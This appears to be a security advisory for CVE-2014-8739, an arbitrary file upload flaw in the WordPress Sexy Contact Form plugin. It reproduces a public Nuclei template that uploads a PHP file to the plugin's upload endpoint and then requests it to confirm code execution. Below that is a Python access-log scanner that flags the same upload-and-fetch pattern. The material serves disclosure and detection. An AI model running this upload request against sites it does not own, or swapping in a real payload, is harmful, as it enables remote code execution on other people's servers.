CVE-2014-8739: WordPress Sexy Contact Form (<= 0.9.7) - Arbitrary File Upload

Date: 2025-08-01 | Affected software: WordPress Sexy Contact Form | PoC: public

Vulnerability description

Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with a PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.

PoC code [public]

id: CVE-2014-8739

info:
  name: WordPress Sexy Contact Form (<= 0.9.7) - Arbitrary File Upload
  author: melmathari
  severity: critical
  description: |
    Unrestricted file upload vulnerability in server/php/UploadHandler.php in the jQuery File Upload Plugin 6.4.4 for jQuery, as used in the Creative Solutions Creative Contact Form (formerly Sexy Contact Form) before 1.0.0 for WordPress and before 2.0.1 for Joomla!, allows remote attackers to execute arbitrary code by uploading a PHP file with an PHP extension, then accessing it via a direct request to the file in files/, as exploited in the wild in October 2014.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
    - https://www.exploit-db.com/exploits/35057
    - https://www.exploit-db.com/exploits/36811
    - http://www.openwall.com/lists/oss-security/2014/11/11/4
    - http://www.openwall.com/lists/oss-security/2014/11/11/5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.83444
    epss-percentile: 0.99235
    cpe: cpe:2.3:a:creative-solutions:creative_contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: creative-solutions
    product: creative_contact_form
    framework: wordpress
    publicwww-query: "/wp-content/plugins/sexy-contact-form/"
  tags: cve,cve2014,wordpress,wp-plugin,wp,sexy-contact-form,intrusive,file-upload,rce

flow: http(1) && http(2)

variables:
  marker: "{{randstr}}"
  fname: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="files[]"; filename="{{fname}}.php"
        Content-Type: application/octet-stream

        <?php echo "{{marker}}"; ?>
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "files","delete_url")'
          - 'contains(content_type, "text/plain")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/{{fname}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        words:
          - "{{marker}}"
# digest: 4b0a004830460221008e1ed7371d6aa38df7c21390fbfc1fe5e5dd7416dd6f2888d9d625a43369dcfe022100d70b65d92a0083d6412f5ecd11f8c43734c797db3dfd9a27cabb6f3eef904839:922c64590222798bb761d5b6d8e72950
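The description and the template above both show the same two-request pattern: a POST to the plugin's fileupload/index.php followed by a GET for the uploaded file under files/. As an added example, not part of this advisory or of the Nuclei template, the following Python scans web server access logs for that pattern from the defender's side. It assumes the Apache/nginx "combined" log format; the log lines are constructed samples using documentation IP ranges, and the list of executable extensions is an assumption about which files the web server hands to the PHP interpreter.

```python
import re
from collections import defaultdict
from datetime import datetime

# Endpoints taken from the PoC template above.
UPLOAD_ENDPOINT = "/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
FILES_DIR = "/wp-content/plugins/sexy-contact-form/includes/fileupload/files/"

# Assumption: extensions the web server would hand to the PHP interpreter.
EXECUTABLE_EXTS = (".php", ".phtml", ".php5", ".phar")

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [14/Oct/2014:10:01:02 +0000] "POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1" 200 143 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Oct/2014:10:01:05 +0000] "GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/abcdef.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.4 - - [14/Oct/2014:10:02:00 +0000] "POST /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php HTTP/1.1" 200 140 "-" "Mozilla/5.0"
198.51.100.4 - - [14/Oct/2014:10:02:01 +0000] "GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/resume.pdf HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [14/Oct/2014:11:30:00 +0000] "GET /wp-content/plugins/sexy-contact-form/includes/fileupload/files/abcdef.php HTTP/1.1" 200 12 "-" "curl/7.38.0"
192.0.2.9 - - [14/Oct/2014:11:31:00 +0000] "GET /index.php HTTP/1.1" 200 9001 "-" "curl/7.38.0"
"""


def parse_line(line):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop query string before comparing paths
    return rec


def find_upload_chains(lines, window_seconds=600):
    """Return (severity, ip, path) alerts.

    "high":   a successful POST to the upload endpoint from an IP, followed within
              window_seconds by a successful GET of an executable file under files/
              from the same IP (the two-step pattern the template reproduces).
    "medium": a successful GET of an executable file under files/ with no matching
              upload from that IP (e.g. a previously planted file being fetched).
    """
    recent_uploads = defaultdict(list)  # ip -> timestamps of successful upload POSTs
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 200:
            continue
        if rec["method"] == "POST" and rec["path"] == UPLOAD_ENDPOINT:
            recent_uploads[rec["ip"]].append(rec["ts"])
        elif (rec["method"] == "GET" and rec["path"].startswith(FILES_DIR)
              and rec["path"].lower().endswith(EXECUTABLE_EXTS)):
            chained = any(0 <= (rec["ts"] - t).total_seconds() <= window_seconds
                          for t in recent_uploads[rec["ip"]])
            alerts.append(("high" if chained else "medium", rec["ip"], rec["path"]))
    return alerts


if __name__ == "__main__":
    for sev, ip, path in find_upload_chains(SAMPLE_LOG.splitlines()):
        print(f"{sev:6} {ip:15} {path}")
```

On the sample log this flags the first client as "high" (upload followed three seconds later by a fetch of a .php under files/), ignores the second client (the uploaded file is a PDF), and flags the third as "medium" (a .php under files/ requested with no upload from that address). On a patched or hardened site, any 200 response for an executable file under that directory is itself a finding, since the plugin's upload directory should never serve PHP.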